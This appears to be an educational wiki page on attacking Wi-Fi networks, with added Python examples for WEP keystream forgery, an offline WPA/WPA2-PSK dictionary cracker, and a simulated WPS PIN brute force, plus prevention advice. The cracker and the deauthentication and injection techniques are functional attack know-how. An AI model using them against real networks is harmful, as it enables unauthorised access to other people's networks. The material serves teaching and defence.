Hacking/Attack/Wireless networks

Cracking a wireless network means defeating the security of a wireless local-area network (WLAN). The most common WLAN is a Wi-Fi network. Wireless LANs have inherent security weaknesses that wired networks do not share: the medium is a broadcast one, every frame is audible to anyone in range, and it can be reached from outside the premises without a physical connection.

Two frequent types of vulnerabilities in wireless LANs are those caused by poor configuration, and those caused by weak or flawed security protocols.

Wi-Fi basics

 * Wi-Fi is the brand name of a family of protocols based on the IEEE 802.11 standards.
 * A service set is a group of wireless devices that share a service set identifier (SSID).
 * 802.11 networks are either infrastructure networks or ad hoc networks. By default, people mean infrastructure networks.


 * Infrastructure networks are composed of one or more access points (AP) that coordinate the wireless traffic between the nodes and usually connect the nodes to a wired network, acting as a bridge or a router.
 * Each access point constitutes a network that is named a basic service set or BSS. A BSS is identified by a BSSID, usually the MAC address of the access point's radio.
 * Each access point is part of an extended service set or ESS, which is identified by an extended service set identifier (ESSID), or SSID in short, usually a character string.
 * A basic service set consists of one access point and several wireless clients. An extended service set is a configuration with multiple APs sharing one SSID and roaming capabilities for the clients. An independent basic service set or IBSS is the ad hoc configuration. This configuration allows wireless clients to connect to each other directly, without an access point as a central manager.
 * APs broadcast beacon frames regularly to make the network known to clients. They relay traffic from one wireless client to another. An AP may decide which clients are allowed to connect, and once a client has connected it is said to be associated with the access point. To join a network a client needs the SSID; frames are then addressed to and from the BSSID.
 * Ad hoc networks have no access point for central coordination. Each node connects in a peer-to-peer way. This configuration is an independent basic service set or IBSS. Ad hoc networks also have an SSID.

802.11 networks use data frames, management frames, and control frames. Data frames convey the real data and are similar to those of Ethernet. Management frames maintain both network configuration and connectivity. Control frames manage access to the medium and prevent APs and clients from interfering with each other. Some information on management frames helps to understand what reconnaissance programs do. One property matters for everything that follows: unless the network uses 802.11w (Protected Management Frames), none of the management frames below is authenticated, so any of them can be forged by anyone who knows the MAC addresses involved.
 * Beacon frames are used primarily in reconnaissance. They advertise the existence and basic configuration of the network. Each frame contains the BSSID, the SSID, and information on the supported authentication and encryption (the privacy bit in the capability field and, for WPA/WPA2, an RSN element listing cipher and key-management suites). Clients use the flow of beacon frames to monitor the signal strength of their access point.
 * Probe request frames are almost the same as beacon frames. A probe request frame is sent by a client that wants to find or connect to a wireless network. It contains information about the requested network, including the SSID when the client is looking for a specific one.
 * Probe response frames are sent to clients to answer probe request frames. One response frame answers each request frame, and it contains information on the capabilities and configuration of the network. Useful for reconnaissance.
 * Authentication request frames are sent by clients when they want to connect to a network. Authentication precedes association in infrastructure networks. Either open or shared key authentication is possible. After serious flaws were found in shared key authentication (the WEP challenge-response leaks keystream to an eavesdropper), most networks switched to open authentication, combined with a stronger authentication method applied after the association phase.
 * Authentication response frames are sent to clients to answer authentication request frames. There is one answer to each request, and it contains either status information or a challenge related to shared key authentication.
 * Association request frames are sent by clients to associate with the network. An association request frame contains much of the same information as the probe request, and it must carry the SSID. This can be used to obtain the SSID when a network is configured to hide the SSID in beacon frames.
 * Association response frames are sent to clients to answer an association request frame. They contain a bit of network information and indicate whether the association was successful.
 * Deauthentication and disassociation frames are sent to a node to notify it that an authentication or an association has been terminated and must be established anew. Because they are not authenticated (without 802.11w), an attacker can spoof them to push a client off the network and force it to reconnect; this is the basis of the handshake- and ARP-capture techniques below.
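The frames described in the list above can be decoded with a few dozen lines of code. The following is an added example written for this page, not code from the original text or from any of the tools it mentions; the MAC addresses, SSID and channel in the constructed frames are made-up values. It builds a beacon, a hidden-SSID beacon and an association request, and parses the 24-byte management header, the fixed fields and the tagged parameters, including the RSN element that announces the cipher and key-management suites in use.

```python
"""Parser for 802.11 management frames (beacon, probe, association).
Added example, not code from the original page; the frames below are constructed."""
import struct

SUBTYPES = {0: "assoc-req", 1: "assoc-resp", 4: "probe-req", 5: "probe-resp",
            8: "beacon", 10: "disassoc", 11: "auth", 12: "deauth"}
CIPHERS = {1: "WEP-40", 2: "TKIP", 4: "CCMP", 5: "WEP-104"}   # RSN suite types (OUI 00-0F-AC)
AKMS = {1: "802.1X", 2: "PSK"}

def mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)

def parse_ies(body: bytes) -> dict:
    """Split the tagged parameters (information elements) into {tag: payload}."""
    ies, off = {}, 0
    while off + 2 <= len(body):
        tag, length = body[off], body[off + 1]
        ies[tag] = body[off + 2: off + 2 + length]
        off += 2 + length
    return ies

def parse_rsn(ie: bytes) -> dict:
    """RSN element (tag 48): what the beacon says about encryption and authentication."""
    version = struct.unpack_from("<H", ie, 0)[0]
    group = CIPHERS.get(ie[5], "unknown")                     # group suite: OUI(3) + type(1)
    n_pair = struct.unpack_from("<H", ie, 6)[0]
    pairwise = [CIPHERS.get(ie[8 + 4 * i + 3], "unknown") for i in range(n_pair)]
    off = 8 + 4 * n_pair
    n_akm = struct.unpack_from("<H", ie, off)[0]
    akm = [AKMS.get(ie[off + 2 + 4 * i + 3], "unknown") for i in range(n_akm)]
    return {"version": version, "group": group, "pairwise": pairwise, "akm": akm}

def parse_mgmt(frame: bytes) -> dict:
    fc = struct.unpack_from("<H", frame, 0)[0]
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    if ftype != 0:
        raise ValueError("not a management frame")
    info = {"subtype": SUBTYPES.get(subtype, subtype),
            "da": mac(frame[4:10]), "sa": mac(frame[10:16]), "bssid": mac(frame[16:22])}
    body = frame[24:]                                          # after the 24-byte MAC header
    if subtype in (8, 5):                                      # beacon / probe response
        _ts, interval, cap = struct.unpack_from("<QHH", body, 0)
        info["interval"], info["privacy"] = interval, bool(cap & 0x0010)
        ies = parse_ies(body[12:])
    elif subtype == 0:                                         # association request
        ies = parse_ies(body[4:])                              # capability(2) + listen interval(2)
    elif subtype == 4:                                         # probe request: IEs only
        ies = parse_ies(body)
    else:
        ies = {}
    ssid = ies.get(0)
    info["ssid"] = ssid.decode(errors="replace") if ssid else None  # None: hidden or absent
    if 3 in ies:
        info["channel"] = ies[3][0]
    if 48 in ies:
        info["rsn"] = parse_rsn(ies[48])
    return info

# ---- constructed frames (made-up addresses and SSID) -------------------------
AP, STA, BCAST = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb"), b"\xff" * 6
RSN_WPA2_PSK_CCMP = (struct.pack("<H", 1) + b"\x00\x0f\xac\x04"          # group CCMP
                     + struct.pack("<H", 1) + b"\x00\x0f\xac\x04"         # pairwise CCMP
                     + struct.pack("<H", 1) + b"\x00\x0f\xac\x02"         # AKM PSK
                     + struct.pack("<H", 0))                              # RSN capabilities

def ie(tag: int, payload: bytes) -> bytes:
    return bytes([tag, len(payload)]) + payload

def mgmt_header(subtype: int, da: bytes, sa: bytes, bssid: bytes, seq: int = 0) -> bytes:
    return struct.pack("<HH", subtype << 4, 0) + da + sa + bssid + struct.pack("<H", seq << 4)

def build_beacon(ssid: bytes, channel: int, rsn: bytes = None, hidden: bool = False) -> bytes:
    cap = 0x0411 if rsn else 0x0401                            # ESS (+ privacy bit when encrypted)
    body = struct.pack("<QHH", 0, 100, cap) + ie(0, b"" if hidden else ssid)
    body += ie(1, b"\x82\x84\x8b\x96") + ie(3, bytes([channel]))
    return mgmt_header(8, BCAST, AP, AP) + body + (ie(48, rsn) if rsn else b"")

def build_assoc_req(ssid: bytes) -> bytes:
    return mgmt_header(0, AP, STA, AP) + struct.pack("<HH", 0x0411, 10) + ie(0, ssid)

if __name__ == "__main__":
    print(parse_mgmt(build_beacon(b"corpnet", 6, RSN_WPA2_PSK_CCMP)))
    print(parse_mgmt(build_beacon(b"corpnet", 6, RSN_WPA2_PSK_CCMP, hidden=True)))
    print(parse_mgmt(build_assoc_req(b"corpnet")))
```

The hidden beacon parses with an empty SSID element, and the association request from the client then reveals the name; this is exactly the "SSID decloaking" that passive tools perform by watching for the first client to join.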

Reconnaissance of wireless networks
Reconnaissance is performed by network scanners or sniffers and relies on the monitor mode (aka rfmon) of the wireless card, in which the card passes every frame heard on a channel to the host rather than only frames addressed to it.

Wardriving is a common method of wireless network reconnaissance. A well-equipped wardriver uses a laptop computer with a wireless card, an antenna mounted on the car, a power inverter, a connected GPS receiver, and a way to connect to the Internet wirelessly. The purpose of wardriving is to locate wireless networks and to collect information about their configuration and associated clients.

Basic tools

 * linssid - GUI
 * wavemon - TUI
 * iwlist scan
 * iw dev $w scan ($w being the name of the wireless interface)
 * nmcli dev wifi
 * airodump-ng $w (the interface must be in monitor mode; see airmon-ng below)

Bettercap
Bettercap is a powerful, easily extensible and portable framework written in Go. It aims to offer security researchers, red teamers and reverse engineers an easy-to-use, all-in-one tool for reconnaissance of and attacks on Wi-Fi, Bluetooth Low Energy, wireless HID devices and Ethernet networks.


 * https://www.bettercap.org/modules/wifi/
 * https://www.bettercap.org/modules/ble/
 * https://www.bettercap.org/modules/hid/

inSSIDer
inSSIDer uses the current wireless card or a wireless USB adapter and supports most GPS devices (namely those that use or higher). Its graphical user interface shows MAC address, SSID, signal strength, hardware brand, security, and network type of nearby Wi-Fi networks. It can also track the strength of the signals and show them in a time graph.

Kismet
Kismet is a multi-platform wireless network detector, sniffer and traffic analyser. It works passively from monitor mode, so it does not reveal itself over the air.

Wireshark
Wireshark is a packet sniffer and network traffic analyser that runs on all popular operating systems, but its support for capturing wireless traffic is limited (on most platforms the card has to be put into monitor mode by other means first). It is free and open source. Decoding and analysing wireless traffic is not the foremost function of Wireshark, but it can give results that cannot be obtained with other programs. Wireshark requires sufficient knowledge of the network protocols to obtain a full analysis of the traffic, however.

Analysers of AirMagnet
AirMagnet Laptop Analyser and AirMagnet Handheld Analyser are wireless network analysis tools made by AirMagnet. The company started with the Handheld Analyser, which was very suitable for surveying sites where wireless networks were deployed as well as for finding rogue access points. The Laptop Analyser was released because the hand-held product was impractical for the reconnaissance of wide areas. These commercial analysers probably offer the best combination of powerful analysis and a simple user interface. However, they are not as well adapted to the needs of a wardriver as some of the free programs.

Androdumpper
Androdumpper is an Android APK used to test WPS-enabled wireless routers whose PIN can be predicted by known default-PIN algorithms (derived from the BSSID) or brute-forced. It runs best on Android versions 5.0 to 8.0.

Airopeek
Airopeek is a packet sniffer and network traffic analyser made by Wildpackets. This commercial program supports Windows and works with most wireless network interface cards. It became an industry standard for capturing and analysing wireless traffic. However, like Wireshark, Airopeek requires thorough knowledge of the protocols to be used to its full ability.

KisMac
KisMac is a program for the discovery of wireless networks that runs on the OS X operating system. The functionality of KisMac includes GPS support with mapping, SSID decloaking, deauthentication attacks, and cracking.

Penetration of wireless networks
There are two basic types of vulnerabilities associated with WLANs: those caused by poor configuration and those caused by poor encryption. Poor configuration causes many vulnerabilities. Wireless networks are often put into use with no or insufficient security settings. With no security settings, the default configuration of many devices, access is obtained simply by association. With insufficient security settings, SSID hiding and MAC address filtering can easily be defeated. Poor encryption causes the remaining vulnerabilities. Wired Equivalent Privacy (WEP) is defective and can be defeated in several ways. Wi-Fi Protected Access with a pre-shared key (WPA-PSK) and Cisco's Lightweight Extensible Authentication Protocol (LEAP) are vulnerable to dictionary attacks. Some attacks start from.

Recent attacks:
 * Kr00k — a vulnerability in some Wi-Fi chipsets: after a disassociation the session key is zeroed, but data still in the transmit buffer is sent encrypted with that all-zero key and can be decrypted by anyone. Discovered in 2019.
 * KRACK — Key Reinstallation Attacks. Breaks WPA2 by replaying handshake messages so that the client reinstalls an already-used key and reuses nonces. Discovered in 2016, disclosed in 2017; fixed on the client side by patches, not by changing the passphrase.

Wired Equivalent Privacy (WEP)
WEP [1997 - 2004] was the first encryption standard available for wireless networks. It can be deployed in 64 and 128 bit strength. 64 bit WEP has a secret key of 40 bits and an initialisation vector (IV) of 24 bits, and is often called 40 bit WEP. 128 bit WEP has a secret key of 104 bits and an IV of 24 bits, and is called 104 bit WEP. Association is possible using a password, an ASCII key, or a hexadecimal key. The per-packet RC4 key is the IV concatenated with the secret key, and the IV is sent in the clear in front of every packet; with only 16 million IVs, a busy network repeats keystream within hours.

There are two classic methods for cracking WEP: the FMS attack and the chopping attack. The FMS attack, named after Fluhrer, Mantin, and Shamir, is based on a weakness of the key scheduling of the RC4 encryption algorithm. The researchers found that about 9000 of the 16 million possible IVs are weak, and collecting enough packets sent under weak IVs allows the key to be determined. To crack the WEP key in most cases, about 5 million encrypted packets must be captured to collect some 3000 weak IVs (in some cases 1500 suffice, in others more than 5000 are needed). The weak IVs are fed to a simulation of the key scheduling algorithm (KSA) and the pseudo-random generation algorithm (PRNG) to determine the first byte of the secret key, and the procedure is repeated for the remaining bytes. The later KoreK and PTW attacks (see Aircrack-ng below) exploit more statistical biases of RC4 and need only tens of thousands of packets rather than millions.

The chopping attack (chopchop) chops the last byte off a captured encrypted packet. This invalidates the cyclic redundancy check used as integrity check value (CRC/ICV). Because CRC-32 is linear, for each guess of the chopped byte's plaintext value the ICV can be repaired by XORing the last four bytes with a value that depends only on the guess (result = original XOR a known value). The manipulated packet is retransmitted, and the access point accepts and relays it only when the guess was right. Repeating this byte by byte recovers the plaintext, and therefore the keystream, for that IV without knowing the key; this keystream is enough to forge packets for injection, and a collection of IV/keystream pairs feeds the statistical key recovery.

The main problem with both attacks is that passively capturing enough packets can take weeks or sometimes months. Fortunately for the attacker, the rate of capture can be increased by injecting packets into the network. One or more Address Resolution Protocol (ARP) packets are usually collected to this end, and then retransmitted to the access point repeatedly until enough response packets, each under a fresh IV, have been captured.
ARP packets are a good choice for three reasons: they have a recognisable fixed size (28 bytes of ARP payload, hence a fixed encrypted frame length), their LLC/SNAP and ARP headers are known plaintext, and the access point rebroadcasts a replayed request under a new IV every time. Waiting for a legitimate ARP packet can take a while; they are most commonly seen right after a client (re)connects. Rather than waiting, sending a spoofed deauthentication frame pushes a client off the network and forces it to reconnect, which usually produces an ARP request.
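The keystream-reuse property that the FMS, chopping and injection techniques all rest on can be shown directly. The block below is an added example, not code from the original page or from aircrack-ng; the 40-bit key, the IV and the packet contents are constructed values. It implements RC4 and the WEP frame format (IV || RC4(plaintext || CRC-32 ICV)), recovers 16 bytes of keystream from the known LLC/SNAP and ARP header of one captured ARP request, uses that keystream to read the start of another frame sent under the same IV, and forges a short frame that the receiver accepts as valid, all without the secret key.

```python
"""WEP (RC4 + CRC-32 ICV) and why keystream reuse breaks it.
Added example, not code from the page; key, IV and packets are constructed."""
import struct
import zlib

def rc4_keystream(key: bytes, n: int) -> bytes:
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm (KSA)
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):                         # pseudo-random generation algorithm (PRGA)
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def icv(data: bytes) -> bytes:
    return struct.pack("<I", zlib.crc32(data))   # unkeyed CRC-32: anyone can compute it

def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    # per-packet RC4 key is IV || secret key; the IV travels in the clear
    body = plaintext + icv(plaintext)
    return iv + xor(body, rc4_keystream(iv + key, len(body)))

def wep_decrypt(key: bytes, frame: bytes):
    iv, ct = frame[:3], frame[3:]
    pt = xor(ct, rc4_keystream(iv + key, len(ct)))
    data, tag = pt[:-4], pt[-4:]
    return data, tag == icv(data)

# LLC/SNAP header + fixed ARP fields of an IPv4-over-Ethernet ARP request: 16 known bytes
ARP_REQUEST_PREFIX = bytes.fromhex("aaaa03000000" "0806" "0001080006040001")

def recover_keystream(frame: bytes, known_plaintext: bytes) -> bytes:
    # keystream = ciphertext XOR known plaintext; valid for this IV only, no key needed
    return xor(frame[3:3 + len(known_plaintext)], known_plaintext)

def forge_frame(iv: bytes, keystream: bytes, payload: bytes) -> bytes:
    body = payload + icv(payload)
    if len(body) > len(keystream):
        raise ValueError("not enough keystream for payload + ICV")
    return iv + xor(body, keystream)

def demo():
    key = bytes.fromhex("0102030405")          # constructed 40-bit WEP key (the secret)
    iv = b"\x11\x22\x33"                        # constructed 24-bit IV
    arp = ARP_REQUEST_PREFIX + bytes.fromhex("001122334455c0a80101" "000000000000c0a80102")
    captured = wep_encrypt(key, iv, arp)
    ks = recover_keystream(captured, ARP_REQUEST_PREFIX)
    # 1) any other frame under the same IV leaks its first 16 bytes
    other = wep_encrypt(key, iv, b"GET /secret HTTP/1.0\r\n")
    leaked = xor(other[3:3 + len(ks)], ks)
    # 2) a short frame with a valid ICV can be forged from the recovered keystream alone
    forged = forge_frame(iv, ks, bytes(range(1, 13)))
    data, ok = wep_decrypt(key, forged)
    return leaked, data, ok

if __name__ == "__main__":
    leaked, data, ok = demo()
    print("leaked:", leaked, "forged accepted:", ok, data.hex())
```

Sixteen bytes of keystream per IV looks small, but the attack extends itself: the forged frame can be an ARP request that the access point rebroadcasts under a new IV, and by fragmenting a longer packet into pieces that each fit the known keystream an attacker obtains longer keystream for that IV. That is the mechanism behind the injection step described above.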

Wi-Fi Protected Access (WPA/WPA2)
Wi-Fi Protected Access (WPA) was developed because of the vulnerabilities of WEP. WPA uses either a pre-shared key (WPA-PSK, also called WPA-Personal) or an authentication server, normally a RADIUS server reached through 802.1X (WPA-RADIUS or WPA-Enterprise). For its encryption WPA uses the Temporal Key Integrity Protocol (TKIP), a per-packet re-keying wrapper around RC4 that could run on WEP-era hardware. WPA2 was developed, on the basis of IEEE 802.11i, to fix the remaining weaknesses of WPA and to strengthen the encryption: it mandates CCMP, which is based on the Advanced Encryption Standard (AES), and keeps TKIP only for backward compatibility. In both versions the enterprise mode carries its authentication piece in a form of the Extensible Authentication Protocol (EAP).

WPA-PSK can be attacked offline when the passphrase is weak, that is, when it appears in a word-list or is short enough to brute-force; the figure of 21 characters sometimes quoted is a rule of thumb for a random passphrase being out of reach, not a property of the protocol. Firstly, the four-way EAPOL-Key handshake must be captured. This can be done during a legitimate authentication, or a reauthentication can be forced by sending deauthentication packets to clients; messages 1 and 2 are sufficient, since they carry both nonces and the first MIC. Secondly, each word of a word-list is turned into a pairwise master key (PMK) with PBKDF2-HMAC-SHA1, using the SSID as salt and 4096 iterations; the PMK, the two so-called nonce values, the MAC address of the client that asked for authentication and the MAC address of the access point are expanded into the pairwise transient key (PTK); and the first 16 bytes of the PTK are used to recompute the Message Integrity Code (MIC, HMAC-MD5 for TKIP or truncated HMAC-SHA1 for CCMP) over the captured EAPOL frame. A match identifies the passphrase. Word-lists can be found at.

LEAP uses a variation of Microsoft Challenge Handshake Authentication Protocol version 2 (MS-CHAPv2). The challenge-response uses the Data Encryption Standard (DES) with keys cut from the user's NT password hash, and the third DES key contains only two bytes of hash, so those two bytes can be brute-forced from a captured response and then used to filter a word-list. LEAP is therefore cracked with a dictionary attack on a captured authentication sequence.

WPA-RADIUS is not subject to this handshake attack, because the PMK is generated per session by the authentication server rather than derived from a passphrase. However, if the RADIUS authentication server itself can be compromised, or clients are configured not to validate its certificate, the whole network is imperilled. The security of authentication servers is often neglected.

WPA2-PSK is attacked with exactly the same handshake dictionary attack as WPA-PSK: the cipher upgrade to CCMP changes the MIC algorithm but not the passphrase derivation, so the strength of WPA2-PSK is the strength of the passphrase.
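The passphrase check described above, carried out the way a cracker does it offline. This is an added example written for this page, not the code of CoWPAtty or Aircrack-ng; the SSID, MAC addresses, nonces, secret passphrase and word-list are constructed, and only EAPOL-Key message 2 of the handshake is built, since message 1 contributes nothing but the ANonce, which is passed in directly. It derives the PMK with PBKDF2-HMAC-SHA1, expands it to the PTK with the IEEE 802.11i PRF, recomputes the MIC over the captured frame with the KCK, and returns the word whose MIC matches.

```python
"""Offline dictionary attack on a captured WPA/WPA2-PSK four-way handshake.
Added example, not code from the page. Handshake material is constructed so that
the script runs offline; a real attack feeds the same functions with values
parsed from captured EAPOL-Key messages 1 and 2."""
import hashlib
import hmac
import struct

def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 256 bits).
    # The SSID is the salt, which is why precomputed tables only work per SSID.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PRF-512 over "Pairwise key expansion"; the first 16 bytes of the PTK are the KCK.
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    blocks = [hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]

MIC_OFFSET = 81   # EAPOL header (4) + descriptor type (1) + key info (2) + key length (2)
                  # + replay counter (8) + nonce (32) + key IV (16) + RSC (8) + key ID (8)

def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    # Key-descriptor version (low 3 bits of key info): 1 = HMAC-MD5 (TKIP), 2 = HMAC-SHA1 (CCMP).
    version = struct.unpack_from(">H", eapol, 5)[0] & 0x7
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]

def crack_psk(ssid, ap_mac, sta_mac, anonce, snonce, eapol, wordlist):
    """Return the word-list entry that reproduces the MIC of the captured frame, or None."""
    captured_mic = eapol[MIC_OFFSET:MIC_OFFSET + 16]
    for word in wordlist:
        kck = derive_ptk(pmk_from_passphrase(word, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol), captured_mic):
            return word
    return None

# ---- constructed "capture" ----------------------------------------------------
SSID = "corpnet"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = hashlib.sha256(b"anonce").digest()    # constructed; real nonces are random
SNONCE = hashlib.sha256(b"snonce").digest()

def build_message2(passphrase: str) -> bytes:
    """EAPOL-Key message 2 as the client sends it: SNonce plus a MIC keyed by the KCK."""
    key_info = 0x010A                          # descriptor version 2 (CCMP), pairwise, MIC set
    body = (bytes([2]) + struct.pack(">HH", key_info, 0) + (1).to_bytes(8, "big")
            + SNONCE + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16
            + struct.pack(">H", 0))
    eapol = struct.pack(">BBH", 1, 3, len(body)) + body       # EAPOL v1, type 3 = EAPOL-Key
    kck = derive_ptk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return eapol[:MIC_OFFSET] + eapol_mic(kck, eapol) + eapol[MIC_OFFSET + 16:]

def demo():
    capture = build_message2("correct horse battery")         # the secret the attacker lacks
    wordlist = ["password", "letmein", "corpnet2019", "correct horse battery", "zzzzzzzz"]
    return crack_psk(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, capture, wordlist)

if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

Each candidate costs 4096 HMAC-SHA1 iterations for the PMK plus four more for the PTK, which is the whole cost model of WPA cracking: the work is per candidate and per SSID, and nothing is sent to the access point.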

Cracking tools

Aircrack-ng
Aircrack-ng runs on Linux, Windows and other platforms, and can crack WEP and WPA/WPA2-PSK. For WEP it implements the PTW attack (Pyshkin, Tews, Weinmann) and the KoreK attacks, statistical methods far more efficient than the traditional FMS attack; PTW typically needs tens of thousands of captured packets rather than millions. For WPA/WPA2-PSK it runs the dictionary attack on a captured handshake. Aircrack-ng consists of components. Airmon-ng puts the wireless network card into monitor mode. Airodump-ng captures the frames. Aireplay-ng generates traffic (deauthentication, ARP replay, injection). Aircrack-ng does the cracking, using the data collected by airodump-ng. Finally, airdecap-ng decrypts captured packets once the key is known. Thus, aircrack-ng is the name of the suite and also of one of its components.

CoWPAtty
CoWPAtty automates the dictionary attack for WPA-PSK. It runs on Linux. The program is started from the command line, specifying a word-list, a dump file that contains the four-way EAPOL handshake, and the SSID of the network (the SSID is needed because it is the salt of the key derivation).

Void11
Void11 is a program that deauthenticates clients. It runs on Linux.

MAC address filtering and its attack
MAC address filtering can be used alone as an ineffective security measure, or in combination with encryption. The attack consists of sniffing an allowed MAC address, which is sent unencrypted in every frame of an associated client, and then changing the MAC address of the attacker's card to that address.

See also Changing Your MAC Address

Conclusion
Cracking of a wireless network is often a stepping stone for penetration testing of the internal network. The wireless network then serves as a so-called entry vector. If WPA-RADIUS is in use at a target site, another entry vector must be investigated.

Prevention and Protection
An unprotected wireless network is extremely insecure. From anywhere within broadcast range, someone can eavesdrop or start using the network. Therefore the IEEE 802.11 standard for wireless networks was accompanied by Wired Equivalent Privacy (WEP). This security protocol was meant to provide the following:
 * authentication: assurance that all participants are who they state they are, and are authorized to use the network
 * confidentiality: protection against eavesdropping
 * integrity: assurance of data being unaltered
WEP has been criticised by security experts and fails on all three counts: shared-key authentication leaks keystream to an eavesdropper, the short IV and the RC4 key schedule make the encryption breakable, and the CRC-32 integrity value is unkeyed and linear, so packets can be altered undetected. Most experts regard it as ineffective by now.

In 2004 the IEEE 802.11i amendment defined a better security protocol, and it was folded into the IEEE 802.11 standard in 2007. This protocol, marketed by the Wi-Fi Alliance as WPA2, uses the AES block cipher (CCMP) instead of the RC4 algorithm and has better procedures for authentication and key distribution. WPA2 is much more secure than WEP, but WEP was still in wide use in 2009.

Many wireless routers also support restricting the MAC addresses of computers that are authorized to use the wireless network. This measure can effectively stop a neighbour from using the network, but experienced intruders will not be stopped. MAC filtering can be attacked because a MAC address is sent in the clear in every frame and can be faked easily.

In the past, turning off the broadcasting of the SSID has also been thought to give security to a wireless network. This is not the case. Freely available tools quickly discover an SSID that is not broadcast, because every client that joins sends it in the clear in its probe and association requests. Microsoft has also determined that switching off the broadcasting of the SSID leads to less security: clients configured for a hidden network must actively probe for it by name wherever they are, revealing the SSID to anyone listening. Details can be found in Non-broadcast Wireless Networks with Microsoft Windows.

Returning to encryption, the WEP specification at any key length cannot withstand a determined attacker. Wi-Fi Protected Access (WPA) was therefore designed as a stop-gap that could run on WEP-era hardware, and software upgrades are often available for such devices. Devices that conform to the current 802.11 standards also support WPA2. (WPA uses TKIP, still built on RC4; WPA2 uses the stronger AES-CCMP.) It is recommended to use only hardware that supports WPA2.

Installing updates regularly, disabling WPS, setting a custom SSID, requiring WPA2, and using a strong passphrase make a wireless router more difficult to crack. Even so, unpatched security flaws in a router's software or firmware may still be used by an attacker to bypass encryption and gain control of the device. Many router manufacturers do not provide security updates in a timely manner, or at all, especially for the cheaper models.

WPS has a severe design flaw: the 8-digit PIN is not verified as a whole. The registrar acknowledges the first four digits separately (after message M4) from the last four (after M6), and the eighth digit is a checksum of the other seven, so the search space is not 10^7 but 10^4 + 10^3 = 11,000 attempts at worst. (The checksum is a weighted mod-10 digit, the same scheme as the EAN-8 check digit.) Most manufacturers now mitigate this with a lock-down mechanism: after a number of failed PIN attempts the router disables WPS automatically, and it can take hours before it unlocks again; some devices even have to be rebooted, which makes the brute force impractical. Without a lock-down, a WPA2 router with WPS enabled can be cracked in a matter of hours by brute-forcing the PIN, after which the router hands over the WPA passphrase itself, regardless of how strong that passphrase is.
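The arithmetic above can be made concrete by simulating the exchange. The following is an added example, not code from the original page or from any WPS-attack tool; the registrar is a mock that only reproduces the NACK-after-M4 / NACK-after-M6 behaviour of a WPS access point, and the PIN 12345670 is a constructed value (it happens to be a valid PIN under the checksum rule). It computes the checksum digit, runs the two-phase search against the mock, counts attempts, and shows that a lock-out after a handful of failures stops the attack.

```python
"""Simulated WPS external-registrar PIN brute force (the split-PIN weakness).
Added example, not code from the page; the registrar is a mock, no packets are sent."""

def wps_checksum(first7: str) -> int:
    # Weighted mod-10 check digit (weights 3,1,3,1,3,1,3), the same scheme as EAN-8.
    acc = sum(int(d) * (3 if i % 2 == 0 else 1) for i, d in enumerate(first7))
    return (10 - acc % 10) % 10

def is_valid_pin(pin8: str) -> bool:
    return len(pin8) == 8 and pin8.isdigit() and int(pin8[7]) == wps_checksum(pin8[:7])

class MockRegistrar:
    """Answers PIN attempts the way a WPS access point does (constructed behaviour)."""
    def __init__(self, pin8: str, lockout_after: int = None):
        assert is_valid_pin(pin8)
        self.pin, self.lockout_after = pin8, lockout_after
        self.attempts = self.failures = 0
        self.locked = False

    def try_pin(self, pin8: str) -> str:
        self.attempts += 1
        if self.locked:
            return "LOCKED"
        if pin8[:4] != self.pin[:4]:
            reply = "NACK-after-M4"     # first half wrong: exchange stops at M4
        elif pin8[4:] != self.pin[4:]:
            reply = "NACK-after-M6"     # first half right, second half wrong
        else:
            return "M7"                 # success: M7 carries the network's WPA passphrase
        self.failures += 1
        if self.lockout_after is not None and self.failures >= self.lockout_after:
            self.locked = True          # the lock-down mitigation
        return reply

def split_pin_attack(reg: MockRegistrar):
    """Phase 1 finds the first four digits (<= 10^4 tries), phase 2 the last three (10^3),
    with the checksum digit computed rather than guessed. Returns the PIN or None."""
    first = None
    for i in range(10_000):
        reply = reg.try_pin(f"{i:04d}0000")
        if reply == "LOCKED":
            return None
        if reply != "NACK-after-M4":
            first = f"{i:04d}"
            if reply == "M7":
                return first + "0000"
            break
    if first is None:
        return None
    for j in range(1_000):
        pin = first + f"{j:03d}"
        pin += str(wps_checksum(pin))
        reply = reg.try_pin(pin)
        if reply == "M7":
            return pin
        if reply == "LOCKED":
            return None
    return None

if __name__ == "__main__":
    reg = MockRegistrar("12345670")
    print("recovered", split_pin_attack(reg), "after", reg.attempts, "attempts")
    reg = MockRegistrar("12345670", lockout_after=10)
    print("with lock-down:", split_pin_attack(reg), "after", reg.attempts, "attempts")
```

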